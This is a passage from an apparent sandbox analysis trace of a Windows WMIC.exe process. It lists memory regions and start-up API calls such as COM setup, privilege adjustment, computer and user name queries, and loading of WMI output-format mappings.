"private_0x0000000000d20000" filename = "" Region: id = 3760 start_va = 0xbc0000 end_va = 0xc5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000bc0000" filename = "" Region: id = 3761 start_va = 0xcf0000 end_va = 0xcfffff entry_point = 0x0 region_type = private name = "private_0x0000000000cf0000" filename = "" Region: id = 3762 start_va = 0xd20000 end_va = 0xdfefff entry_point = 0xd20000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 3763 start_va = 0xf00000 end_va = 0xf0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f00000" filename = "" Region: id = 3764 start_va = 0x5370000 end_va = 0x576ffff entry_point = 0x0 region_type = private name = "private_0x0000000005370000" filename = "" Region: id = 3765 start_va = 0x6a0000 end_va = 0x6a0fff entry_point = 0x6a0000 region_type = mapped_file name = "msxml3r.dll" filename = "\\Windows\\SysWOW64\\msxml3r.dll" (normalized: "c:\\windows\\syswow64\\msxml3r.dll") Region: id = 3766 start_va = 0x730000 end_va = 0x73ffff entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 3767 start_va = 0x6b0000 end_va = 0x6cffff entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 3768 start_va = 0x746c0000 end_va = 0x7481ffff entry_point = 0x746c0000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 3769 start_va = 0x743f0000 end_va = 0x746b0fff entry_point = 0x743f0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 3770 start_va = 0x75080000 end_va = 0x750c3fff entry_point = 0x75080000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 3771 start_va = 0x778a0000 end_va = 0x7792cfff entry_point = 0x778a0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 3772 start_va = 0x77990000 end_va = 0x77a0afff entry_point = 0x77990000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3773 start_va = 0x76ca0000 end_va = 0x76decfff entry_point = 0x76ca0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3774 start_va = 0x74d70000 end_va = 0x74eaffff entry_point = 0x74d70000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3775 start_va = 0x6d0000 end_va = 0x6f9fff entry_point = 0x6d0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3776 start_va = 0xf10000 end_va = 0x1097fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f10000" filename = "" Region: id = 3777 start_va = 0x775e0000 end_va = 0x7760afff entry_point = 0x775e0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3778 start_va = 0x76f70000 end_va = 0x7708ffff entry_point = 0x76f70000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3779 start_va = 0x6d0000 end_va = 0x6dffff entry_point = 0x6d0000 region_type = mapped_file name = "wmic.exe.mui" filename = "\\Windows\\SysWOW64\\wbem\\en-US\\WMIC.exe.mui" (normalized: "c:\\windows\\syswow64\\wbem\\en-us\\wmic.exe.mui") Region: id = 3780 start_va = 0x10a0000 end_va = 0x1220fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010a0000" filename = "" Region: id = 3781 start_va = 0x5770000 end_va = 0x6b6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005770000" filename = "" Region: id = 3782 start_va = 0x6e0000 end_va = 0x6e0fff entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 3783 start_va = 0x6f0000 end_va = 0x6f0fff entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 3784 start_va = 0x741c0000 end_va = 0x743e3fff entry_point = 0x741c0000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 3785 start_va = 0x77430000 end_va = 0x77519fff entry_point = 0x77430000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 3786 start_va = 0x74bc0000 end_va = 0x74c34fff entry_point = 0x74bc0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 3787 start_va = 0xe00000 end_va = 0xefffff entry_point = 0x0 region_type = private name = "private_0x0000000000e00000" filename = "" Region: id = 3788 start_va = 0x700000 end_va = 0x700fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 3789 start_va = 0xe00000 end_va = 0xeb7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e00000" filename = "" Region: id = 3790 start_va = 0xef0000 end_va = 0xefffff entry_point = 0x0 region_type = private name = "private_0x0000000000ef0000" filename = "" Region: id = 3791 start_va = 0x700000 end_va = 0x703fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 3792 start_va = 0x74ba0000 end_va = 0x74bbcfff entry_point = 0x74ba0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 3793 start_va = 0x6b70000 end_va = 0x6c6ffff entry_point = 0x0 region_type = private name = "private_0x0000000006b70000" filename = "" Region: id = 3794 start_va = 0x74aa0000 end_va = 0x74ab2fff entry_point = 0x74aa0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 3795 start_va = 0x74a70000 end_va = 0x74a9efff entry_point = 0x74a70000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 3796 start_va = 0xbc0000 end_va = 0xbfffff entry_point = 0x0 region_type = private name = "private_0x0000000000bc0000" filename = "" Region: id = 3797 start_va = 0xc00000 end_va = 0xc3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c00000" filename = "" Region: id = 3798 start_va = 0xc50000 end_va = 0xc5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c50000" filename = "" Region: id = 3799 start_va = 0xc60000 end_va = 0xc9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c60000" filename = "" Region: id = 3800 start_va = 0xca0000 end_va = 0xcdffff entry_point = 0x0 region_type = private name = "private_0x0000000000ca0000" filename = "" Region: id = 3801 start_va = 0x1230000 end_va = 0x126ffff entry_point = 0x0 region_type = private name = "private_0x0000000001230000" filename = "" Region: id = 3802 start_va = 0x1270000 end_va = 0x12affff entry_point = 0x0 region_type = private name = "private_0x0000000001270000" filename = "" Region: id = 3803 start_va = 0x7e51a000 end_va = 0x7e51cfff entry_point = 0x0 region_type = private name = "private_0x000000007e51a000" filename = "" Region: id = 3804 start_va = 0x7e51d000 end_va = 0x7e51ffff entry_point = 0x0 region_type = private name = "private_0x000000007e51d000" filename = "" Region: id = 3805 start_va = 0x7e643000 end_va = 0x7e645fff entry_point = 0x0 region_type = private name = "private_0x000000007e643000" filename = "" Region: id = 3806 start_va = 0x741a0000 end_va = 0x741b0fff entry_point = 0x741a0000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 3807 start_va = 0x740e0000 end_va = 0x7419bfff entry_point = 0x740e0000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 3808 start_va = 0x710000 end_va = 0x724fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000710000" filename = "" Region: id = 3809 start_va = 0xec0000 end_va = 0xee8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ec0000" filename = "" Thread: id = 260 os_tid = 0xf40 [0115.609] GetModuleHandleA (lpModuleName=0x0) returned 0x1300000 [0115.609] __set_app_type (_Type=0x1) [0115.609] __p__fmode () returned 0x77ac4d6c [0115.609] __p__commode () returned 0x77ac5b1c [0115.609] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x133aa90) returned 0x0 [0115.609] __wgetmainargs (in: _Argc=0x13491a8, _Argv=0x13491ac, _Env=0x13491b0, _DoWildCard=0, _StartInfo=0x13491bc | out: _Argc=0x13491a8, _Argv=0x13491ac, _Env=0x13491b0) returned 0 [0115.609] ??0CHString@@QAE@XZ () returned 0x13495ec [0115.610] ??0CHString@@QAE@XZ () returned 0x13498fc [0115.610] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0115.610] SetConsoleCtrlHandler (HandlerRoutine=0x1334980, Add=1) returned 1 [0115.610] _onexit (_Func=0x1340a20) returned 0x1340a20 [0115.610] _onexit (_Func=0x1340a30) returned 0x1340a30 [0115.610] _onexit (_Func=0x1340a50) returned 0x1340a50 [0115.610] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0115.610] ResolveDelayLoadedAPI () returned 0x770fcd50 [0115.610] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0115.612] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0115.617] CoCreateInstance (in: rclsid=0x1306a1c*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x1306a2c*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x1349510 | out: ppv=0x1349510*=0x780500) returned 0x0 [0115.627] GetCurrentProcess () returned 0xffffffff [0115.627] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x4ff914 | out: TokenHandle=0x4ff914*=0x158) returned 1 [0115.627] GetTokenInformation (in: TokenHandle=0x158, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4ff910 | out: TokenInformation=0x0, ReturnLength=0x4ff910) returned 0 [0115.628] GetTokenInformation (in: TokenHandle=0x158, TokenInformationClass=0x3, TokenInformation=0x763a38, TokenInformationLength=0x118, ReturnLength=0x4ff910 | out: TokenInformation=0x763a38, ReturnLength=0x4ff910) returned 1 [0115.628] AdjustTokenPrivileges (in: TokenHandle=0x158, DisableAllPrivileges=0, NewState=0x763a38*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0115.628] CloseHandle (hObject=0x158) returned 1 [0115.628] SetThreadUILanguage (LangId=0x0) returned 0x409 [0115.630] _vsnwprintf (in: _Buffer=0x763ac8, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x4ff89c | out: _Buffer="ms_409") returned 6 [0115.630] GetComputerNameW (in: lpBuffer=0x763b10, nSize=0x4ff900 | out: lpBuffer="LHNIWSJ", nSize=0x4ff900) returned 1 [0115.630] lstrlenW (lpString="LHNIWSJ") returned 7 [0115.630] lstrlenW (lpString="LHNIWSJ") returned 7 [0115.630] ResolveDelayLoadedAPI () returned 0x74d5c5f0 [0115.630] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x4ff914 | out: lpNameBuffer=0x0, nSize=0x4ff914) returned 0x0 [0115.631] GetLastError () returned 0xea [0115.631] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x763b38, nSize=0x4ff914 | out: lpNameBuffer="LHNIWSJ\\CIiHmnxMn6Ps", nSize=0x4ff914) returned 0x1 [0115.631] lstrlenW (lpString="") returned 0 [0115.631] lstrlenW (lpString="LHNIWSJ") returned 7 [0115.631] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="", cchCount2=0) returned 3 [0115.632] lstrlenW (lpString=".") returned 1 [0115.632] lstrlenW (lpString="LHNIWSJ") returned 7 [0115.632] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2=".", cchCount2=1) returned 3 [0115.632] lstrlenW (lpString="LOCALHOST") returned 9 [0115.632] lstrlenW (lpString="LHNIWSJ") returned 7 [0115.632] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="LOCALHOST", cchCount2=9) returned 1 [0115.632] lstrlenW (lpString="LHNIWSJ") returned 7 [0115.632] lstrlenW (lpString="LHNIWSJ") returned 7 [0115.632] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="LHNIWSJ", cchCount2=7) returned 2 [0115.632] lstrlenW (lpString="LHNIWSJ") returned 7 [0115.632] lstrlenW (lpString="LHNIWSJ") returned 7 [0115.632] lstrlenW (lpString="LHNIWSJ") returned 7 [0115.632] lstrlenW (lpString="LHNIWSJ") returned 7 [0115.632] ResolveDelayLoadedAPI () returned 0x77bb9840 [0115.635] SysStringLen (param_1="IDENTIFY") returned 0x8 [0115.635] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0115.635] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0115.635] SysStringLen (param_1="IDENTIFY") returned 0x8 [0115.635] SysStringLen (param_1="IMPERSONATE") returned 0xb [0115.635] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0115.635] SysStringLen (param_1="IMPERSONATE") returned 0xb [0115.635] SysStringLen (param_1="IDENTIFY") returned 0x8 [0115.635] SysStringLen (param_1="IDENTIFY") returned 0x8 [0115.635] SysStringLen (param_1="IMPERSONATE") returned 0xb [0115.635] SysStringLen (param_1="DELEGATE") returned 0x8 [0115.635] SysStringLen (param_1="IDENTIFY") returned 0x8 [0115.635] SysStringLen (param_1="DELEGATE") returned 0x8 [0115.635] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0115.635] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0115.635] SysStringLen (param_1="DELEGATE") returned 0x8 [0115.635] SysStringLen (param_1="NONE") returned 0x4 [0115.635] SysStringLen (param_1="DEFAULT") returned 0x7 [0115.635] SysStringLen (param_1="DEFAULT") returned 0x7 [0115.635] SysStringLen (param_1="NONE") returned 0x4 [0115.635] SysStringLen (param_1="CONNECT") returned 0x7 [0115.635] SysStringLen (param_1="DEFAULT") returned 0x7 [0115.636] SysStringLen (param_1="CALL") returned 0x4 [0115.636] SysStringLen (param_1="DEFAULT") returned 0x7 [0115.636] SysStringLen (param_1="CALL") returned 0x4 [0115.636] SysStringLen (param_1="CONNECT") returned 0x7 [0115.636] SysStringLen (param_1="PKT") returned 0x3 [0115.636] SysStringLen (param_1="DEFAULT") returned 0x7 [0115.636] SysStringLen (param_1="PKT") returned 0x3 [0115.636] SysStringLen (param_1="NONE") returned 0x4 [0115.636] SysStringLen (param_1="NONE") returned 0x4 [0115.636] SysStringLen (param_1="PKT") returned 0x3 [0115.636] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0115.636] SysStringLen (param_1="DEFAULT") returned 0x7 [0115.636] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0115.636] SysStringLen (param_1="NONE") returned 0x4 [0115.636] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0115.636] SysStringLen (param_1="PKT") returned 0x3 [0115.636] SysStringLen (param_1="PKT") returned 0x3 [0115.636] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0115.636] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0115.636] SysStringLen (param_1="DEFAULT") returned 0x7 [0115.636] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0115.636] SysStringLen (param_1="PKT") returned 0x3 [0115.636] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0115.636] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0115.636] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0115.636] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0115.636] GetSystemDirectoryW (in: lpBuffer=0x7629d8, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0115.636] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0115.636] SysStringLen (param_1="\\wbem\\") returned 0x6 [0115.637] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0115.637] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0115.637] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0115.637] GetCurrentThreadId () returned 0xf40 [0115.637] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x4ff424 | out: phkResult=0x4ff424*=0x164) returned 0x0 [0115.637] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x4ff430, lpcbData=0x4ff42c*=0x400 | out: lpType=0x0, lpData=0x4ff430*=0x30, lpcbData=0x4ff42c*=0x4) returned 0x0 [0115.637] _wcsicmp (_String1="0", _String2="1") returned -1 [0115.637] _wcsicmp (_String1="0", _String2="2") returned -2 [0115.637] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x4ff42c*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x4ff42c*=0x42) returned 0x0 [0115.637] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x762be0, lpcbData=0x4ff42c*=0x42 | out: lpType=0x0, lpData=0x762be0*=0x25, lpcbData=0x4ff42c*=0x42) returned 0x0 [0115.637] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0115.637] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0115.637] RegQueryValueExW (in: hKey=0x164, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x4ff430, lpcbData=0x4ff42c*=0x400 | out: lpType=0x0, lpData=0x4ff430*=0x36, lpcbData=0x4ff42c*=0xc) returned 0x0 [0115.637] _wtol (_String="65536") returned 65536 [0115.637] RegCloseKey (hKey=0x0) returned 0x6 [0115.637] CoCreateInstance (in: rclsid=0x1306a7c*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x1306a8c*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x4ff8c4 | out: ppv=0x4ff8c4*=0xd145a8) returned 0x0 [0115.646] FreeThreadedDOMDocument:IXMLDOMDocument:Load (in: This=0xd145a8, xmlSource=0x4ff844*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x0), isSuccessful=0x4ff8a8 | out: isSuccessful=0x4ff8a8*=0xffff) returned 0x0 [0115.690] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0xd145a8, DOMElement=0x4ff8bc | out: DOMElement=0x4ff8bc) returned 0x0 [0115.691] SysStringLen (param_1="VALUE") returned 0x5 [0115.691] SysStringLen (param_1="TABLE") returned 0x5 [0115.691] SysStringLen (param_1="TABLE") returned 0x5 [0115.691] SysStringLen (param_1="VALUE") returned 0x5 [0115.691] SysStringLen (param_1="LIST") returned 0x4 [0115.691] SysStringLen (param_1="TABLE") returned 0x5 [0115.692] SysStringLen (param_1="RAWXML") returned 0x6 [0115.692] SysStringLen (param_1="TABLE") returned 0x5 [0115.692] SysStringLen (param_1="RAWXML") returned 0x6 [0115.692] SysStringLen (param_1="LIST") returned 0x4 [0115.692] SysStringLen (param_1="LIST") returned 0x4 [0115.692] SysStringLen (param_1="RAWXML") returned 0x6 [0115.692] SysStringLen (param_1="HTABLE") returned 0x6 [0115.692] SysStringLen (param_1="TABLE") returned 0x5 [0115.692] SysStringLen (param_1="HTABLE") returned 0x6 [0115.692] SysStringLen (param_1="LIST") returned 0x4 [0115.692] SysStringLen (param_1="HFORM") returned 0x5 [0115.692] SysStringLen (param_1="TABLE") returned 0x5 [0115.692] SysStringLen (param_1="HFORM") returned 0x5 [0115.692] SysStringLen (param_1="LIST") returned 0x4 [0115.692] SysStringLen (param_1="HFORM") returned 0x5 [0115.692] SysStringLen (param_1="HTABLE") returned 0x6 [0115.693] SysStringLen (param_1="XML") returned 0x3 [0115.693] SysStringLen (param_1="TABLE") returned 0x5 [0115.693] SysStringLen (param_1="XML") returned 0x3 [0115.693] SysStringLen (param_1="VALUE") returned 0x5 [0115.693] SysStringLen (param_1="VALUE") returned 0x5 [0115.693] SysStringLen (param_1="XML") returned 0x3 [0115.693] SysStringLen (param_1="MOF") returned 0x3 [0115.693] SysStringLen (param_1="TABLE") returned 0x5 [0115.693] SysStringLen (param_1="MOF") returned 0x3 [0115.693] SysStringLen (param_1="LIST") returned 0x4 [0115.693] SysStringLen (param_1="MOF") returned 0x3 [0115.693] SysStringLen (param_1="RAWXML") returned 0x6 [0115.693] SysStringLen (param_1="LIST") returned 0x4 [0115.693] SysStringLen (param_1="MOF") returned 0x3 [0115.694] SysStringLen (param_1="CSV") returned 0x3 [0115.694] SysStringLen (param_1="TABLE") returned 0x5 [0115.694] SysStringLen (param_1="CSV") returned 0x3 [0115.694] SysStringLen (param_1="LIST") returned 0x4 [0115.694] SysStringLen (param_1="CSV") returned 0x3 [0115.694] SysStringLen (param_1="HTABLE") returned 0x6 [0115.694] SysStringLen (param_1="CSV") returned 0x3 [0115.694] SysStringLen (param_1="HFORM") returned 0x5 [0115.694] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0115.694] SysStringLen (param_1="TABLE") returned 0x5 [0115.694] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0115.694] SysStringLen (param_1="VALUE") returned 0x5 [0115.694] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0115.694] SysStringLen (param_1="XML") returned 0x3 [0115.694] SysStringLen (param_1="XML") returned 0x3 [0115.694] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0115.695] SysStringLen (param_1="texttablewsys") returned 0xd [0115.695] SysStringLen (param_1="TABLE") returned 0x5 [0115.695] SysStringLen (param_1="texttablewsys") returned 0xd [0115.695] SysStringLen (param_1="XML") returned 0x3 [0115.695] SysStringLen (param_1="texttablewsys") returned 0xd [0115.695] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0115.695] SysStringLen (param_1="XML") returned 0x3 [0115.695] SysStringLen (param_1="texttablewsys") returned 0xd [0115.695] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0115.696] SysStringLen (param_1="TABLE") returned 0x5 [0115.696] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0115.696] SysStringLen (param_1="XML") returned 0x3 [0115.696] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0115.696] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0115.696] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0115.696] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0115.696] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0115.696] SysStringLen (param_1="TABLE") returned 0x5 [0115.696] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0115.696] SysStringLen (param_1="XML") returned 0x3 [0115.696] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0115.696] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0115.696] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0115.696] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0115.696] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0115.696] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0115.697] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0115.697] SysStringLen (param_1="TABLE") returned 0x5 [0115.697] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0115.697] SysStringLen (param_1="XML") returned 0x3 [0115.697] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0115.697] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0115.697] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0115.697] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0115.697] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0115.697] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0115.697] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0115.697] SysStringLen (param_1="TABLE") returned 0x5 [0115.697] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0115.697] SysStringLen (param_1="XML") returned 0x3 [0115.697] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0115.697] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0115.697] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0115.697] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0115.697] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0115.697] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0115.697] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0115.697] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0115.698] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0115.698] SysStringLen (param_1="TABLE") returned 0x5 [0115.698] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0115.698] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0115.698] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0115.698] SysStringLen (param_1="XML") returned 0x3 [0115.698] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0115.698] SysStringLen (param_1="texttablewsys") returned 0xd [0115.698] SysStringLen (param_1="XML") returned 0x3 [0115.698] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0115.698] SysStringLen (param_1="htable-sortby") returned 0xd [0115.698] SysStringLen (param_1="TABLE") returned 